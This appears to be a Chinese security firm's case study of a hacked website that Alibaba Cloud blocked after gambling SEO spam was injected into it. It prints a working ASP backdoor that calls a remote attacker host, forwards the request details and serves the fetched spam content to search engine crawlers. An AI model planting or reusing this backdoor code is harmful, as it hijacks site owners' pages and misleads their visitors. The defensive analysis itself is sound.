2018年6月26日我們Sine安全公司接到新客戶的安全求助,網站被阿里雲提示:違規URL屏蔽訪問處理通知,導致網站無法訪問,打開網站並提示該內容被禁止訪問。導致客戶的網站流量急劇下滑,網站的用戶都無法正常的登陸會員系統,損失較大,官方網站的形象受到嚴重的影響。
客戶反映說,第一時間打開網站就是提示該內容被禁止訪問,緊接着收到了一份來自阿里雲的”違規URL屏蔽訪問處理通知”郵件提醒,郵件內容如下:
您的網站URL:http://xxx/content-80-3006-1.html涉及違法不良信息,違反了相關服務協議和《互聯網信息服務管理辦法》第十五條規定,目前阿里雲已對您的違法URL做屏蔽訪問處理。如果您對本通知的內容存有疑問,請及時工單或者電話聯系我們, 謝謝您對阿里雲的支持。
被阿里雲違規URL屏蔽訪問提示后隨后,我們安排技術人員對其網站在各大搜索引擎的收錄情況,進行安全檢查,發現了問題,在百度搜索客戶網站域名,發現客戶網站被百度提示:百度網址安全中心提醒您:該頁面可能存在違法信息! 客戶的網站首頁標題也被篡改成了什么世界杯投注的內容。
1.網站被提示違規URL問題分析
網站域名-違法違規信息處理方案依據《產品購買服務協議》第 3 條權利及義務、《阿里雲平台規則》、《網絡安全法》、《互聯網信息服務管理辦法》、《公安 33 號令》等,站點如果存在相關違法違規信息,我方會對存在相關違規信息的 URL 和站點域名進行訪問屏蔽。當訪問您的網站出現以下頁面時,您可以按照以下步驟解封。
如何查看違規信息?
您可以通過雲盾安全管控台-安全管控-互聯網有害信息查看涉及違法違規的 URL 信息。
如何申請解除屏蔽?
若您的站點只有部分 URL 鏈接無法訪問,需要根據系統的提醒,完全刪除所有違法鏈接內的不合規信息后,通過雲盾安全管控台-安全管控-互聯網有害信息進行自主解除處罰 (具體適應場景請見下FAQ)。若您的站點域名下所有 URL 都無法訪問。
申請解除屏蔽條件如下:
第一次處罰,申請解除屏蔽條件:將您的網站違法文件、違法頁面進行徹底整改刪除(包括但不限於我們通知的內容);在公安備案平台申請公安備案,截圖並通過工單反饋售后技術支持,申請解除屏蔽。
特別注意:
第二次 7 天累計超過 100 條,我們會再次關停您的網站,並取消您的賬號參加阿里雲平台全年營銷活動的資格。第三次我們將永久關停您的網站,不再提供解鎖申請,並且您的賬號取消購買資格,后期將無法再在阿里雲平台進行任何產品購買。處罰標准:阿里雲業務安全團隊執行監管政策,針對網民舉報或監管下發 7 天累計超過 100 個違法頁面的網站進行升級處罰。處罰標准如下:累積次數處罰手段解鎖方式第一次(7 天累計違規網頁達 100 條)阻斷域名阻斷域名第二次(7 天累計違規網頁達 100 條)阻斷域名且 1 年內禁止參加阿里雲平台營銷活動完全整改、公安平台成功備案、參加網站安全管理考試及培訓。
第三次(7 天累計違規網頁達 100 條)阻斷域名,賬號禁止購買且永不開通永不開通.
2.網站安全問題分析
接到客戶反映的安全問題后我們Sinesafe安全審計部門技術人員立即對該客戶的網站代碼進行詳細的安全檢測與分析,發現網站里的一些頁面存在木馬后門,甚至有些頁面里含有惡意代碼,截取一段遠程執行代碼。
上述代碼是遠程獲取http地址里面的內容,然后在客戶的網站里,進行訪問。內容都是一些賭博、博彩、世界杯投注內容。很顯然,客戶的網站被黑客攻擊了,網站的程序源代碼也是被上傳了網站木馬后門,通過檢測發現的木馬后門中存在百度劫持快照木馬,專門劫持百度的蜘蛛進行抓取黑客擬定好的博彩內容,讓百度收錄並進行相關的博彩關鍵詞排名。黑客篡改的這些內容,讓百度收錄是有目的性的。因為網站的權重在百度里越高,百度收錄的頁面排名就會越靠前,導致這些違規內容的排名越來越靠前,獲取到的賭博、博彩客戶就越多。通過這個手段來達到目的也是太不擇手段了,竟然損害我們客戶網站的利益,來達到黑客自己的利益。既然了解了為何網站被阿里雲提示違規URL屏蔽訪問,那么就要對網站安全進行全面的代碼安全審計工作,對網站的所有文件,代碼,圖片,數據庫里的內容,進行了詳細的安全檢測與對比,從SQL注入測試、XSS跨站安全測試、表單繞過、文件上傳漏洞測試、文件包含漏洞檢測、網頁掛馬、網頁后門木馬檢測、包括一句話小馬、aspx大馬、腳本木馬后門、敏感信息泄露測試、任意文件讀取、目錄遍歷、弱口令安全檢測等方面進行了全面的安全檢測,與漏洞修復.
3.網站安全問題處理過程
通過我們SINE安全審計部門技術人員對該網站的全面安全檢測審計后,發現客戶用的是獨立服務器win2008 64位系統,網站采用的架構是php+aspx+asp+mysql 屬於多個程序語言混合架構,查找到的網站木馬后門特多,其中有個asp的代碼貼出來給大家看下:
<%
server.timeout=999999
Remote_server="http://xxxxx/" //* 遠程地址
host_name="http://"&request.servervariables("HTTP_HOST")&request.servervariables("_name")
Remote_file = Remote_server&"/index.php"&"?host="&host_name&"&url="&Request.servervariables("Query_String")&"&domain="&Request.servervariables("Server_Name")
Content_mb=GetHtml(Remote_file)
response.write Content_mb
%>
<%
Function GetHtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent","aQ0O010O"
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
End Function
%>
上述代碼主要功能是:通過該asp文件向黑客的遠程地址進行GET訪問,該代碼還做了判斷條件,對瀏覽器的Header信息做了判斷,如果User-Agent是aQ0O010O 那么就會允許get獲取到內容,如果是其他的User-Agent內容則跳轉到404默認頁面,內容圖如下:
由此可見,這個黑客的攻擊手法也是非常高的,讓你無從察覺因為就是個404頁面。偽裝的太逼真了,(看來是遇到真愛了,哈哈,忽悠小少女還是可以,但是對不起我們SINE安全是認真的),訪問用戶通過搜索引擎打開的直接就顯示這個賭博內容,如果是在瀏覽器直接打開地址就會出現這個404 Not Found的內容。
在網站的圖片,以及數據庫配置文件目錄里還發現了一些一句話后門木馬以及圖片木馬:
清除掉這些木馬后門后,網站安全並沒有做完,接下來最重要的是要看網站是怎么被上傳腳本木馬后門的。通過對網站的全面安全檢測、以及網站漏洞檢測,發現客戶的網站存在sql注入以及網站上傳漏洞,以及后台可以cookie繞過登錄權限漏洞,可以直接上傳腳本木馬,拿到服務器權限,從而進行修改篡改網站代碼,發現漏洞后,我們隨即對該客戶網站的漏洞進行修復加固,網站防篡改部署。針對於阿里雲提示:違規URL屏蔽訪問處理通知,我們也幫忙提交阿里雲工單過去,阿里雲的工程處理效率還是蠻快的,第一時間對網站的屏蔽訪問進行了解除,至此問題得已解決。